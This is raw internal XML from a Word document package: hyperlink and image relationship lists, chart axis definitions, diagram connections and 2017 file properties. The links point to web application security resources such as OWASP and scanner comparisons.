Target="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pc-en-internet.infonu.nl/geschiedenis/84250-het-web-web-10-web-20-web-30.html" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/resources/wvsbrochure.pdf" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><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image" Target="media/image12.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="charts/chart1.xm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chart" Target="charts/chart2.xml"/><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footer" Target="footer1.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header18.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xm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header" Target="header19.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header20.xml"/><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png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://torquemag.io/2016/10/13-surprising-wordpress-statistics-updated-2016/" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ithemes.com/2017/01/16/wordpress-security-issues/" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techempower.com/benchmarks/" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sitepoint.com/best-php-framework-2015-sitepoint-survey-results/" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/w/page/13246978/Threat%20Classification" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><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g"/><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png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header21.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header22.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header23.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header24.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId7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eader" Target="header29.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header30.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header31.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header32.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/active/" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/active/" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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image" Target="media/image87.png"/><Relationship Id="rId141"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11.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/></Relationships>
</file>

<file path=word/_rels/header12.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/></Relationships>
</file>

<file path=word/_rels/header13.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/></Relationships>
</file>

<file path=word/_rels/header14.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/></Relationships>
</file>

<file path=word/_rels/header15.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/></Relationships>
</file>

<file path=word/_rels/header16.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/></Relationships>
</file>

<file path=word/_rels/header17.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/></Relationships>
</file>

<file path=word/_rels/header18.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/></Relationships>
</file>

<file path=word/_rels/header19.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20.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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50.png"/></Relationships>
</file>

<file path=word/_rels/header24.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/></Relationships>
</file>

<file path=word/_rels/header26.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>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52.png"/></Relationships>
</file>

<file path=word/_rels/header27.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/></Relationships>
</file>

<file path=word/_rels/header29.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/></Relationships>
</file>

<file path=word/_rels/header30.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/></Relationships>
</file>

<file path=word/_rels/header31.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>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33.png"/></Relationships>
</file>

<file path=word/_rels/header32.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>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33.png"/></Relationships>
</file>

<file path=word/_rels/header33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/></Relationships>
</file>

<file path=word/_rels/header34.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/></Relationships>
</file>

<file path=word/_rels/header35.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/></Relationships>
</file>

<file path=word/_rels/header36.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/></Relationships>
</file>

<file path=word/_rels/header37.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6"/>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853940976"/>
        <c:axId val="854135184"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="85394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854135184"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="854135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85394097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6"/>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853561504"/>
        <c:axId val="853563824"/>
        <c:axId val="0"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="853561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853563824"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="853563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85356150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485CA499-9E14-7C45-A438-69B23D7A4A3B}" type="presOf" srcId="{B0132A91-C8F5-4887-B8B2-69DB7F25D12F}" destId="{76B109A5-F6BB-43FA-9F60-1BB393259A2B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{75DF615D-DE5D-A141-A9B4-21A4E08F80E3}" type="presOf" srcId="{5985C6E8-CE07-4672-9F3F-D84B153659FD}" destId="{B53CC6F6-A64E-4B3D-8EAD-95266F2829A3}"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F231A4F6-1E8C-4147-A2A3-13CA4B8D4346}" type="presOf" srcId="{C03CB45B-22B3-4369-9894-BA1491AF4593}" destId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{24D4D4E4-F764-B94D-B240-8AA8EF766CBE}" type="presOf" srcId="{C6A8E34B-1349-4F6B-8319-F3472407ED06}" destId="{6BD701D1-071C-477D-9027-56FD635BB722}"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C20A21EA-8CB3-4B05-AC59-822E9E45A3C7}" srcId="{C03CB45B-22B3-4369-9894-BA1491AF4593}" destId="{5985C6E8-CE07-4672-9F3F-D84B153659FD}" srcOrd="1" destOrd="0" parTransId="{45831D98-84E6-4DC2-AC77-4CAD6AE17C84}" sibTransId="{DEC44561-81CF-4860-A92D-99F69B008B8F}"/>
    <dgm:cxn modelId="{7800ACA3-3893-5E44-A859-45CD3B75E421}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{76B109A5-F6BB-43FA-9F60-1BB393259A2B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{3022DE8F-3BE9-B240-9C0E-7FCC22A1A5BC}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{BF9F7A04-B148-4E67-A36A-8C8F217049A2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{0859D89A-BBC4-9946-858B-51DB7C49435E}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{B53CC6F6-A64E-4B3D-8EAD-95266F2829A3}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{DDA934B4-FC08-D84E-9DAA-2CE3E33EAD81}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{8E7F1419-364D-4B07-94AE-24C73C49376B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{41F4E929-56EB-114A-8695-F77C10A92984}"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13F3-F7D0-1343-A90E-646352C7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0</Pages>
  <Words>17359</Words>
  <Characters>98949</Characters>
  <Application>Microsoft Macintosh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1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368</cp:revision>
  <cp:lastPrinted>2017-10-22T12:57:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-22T12:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-22T21:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>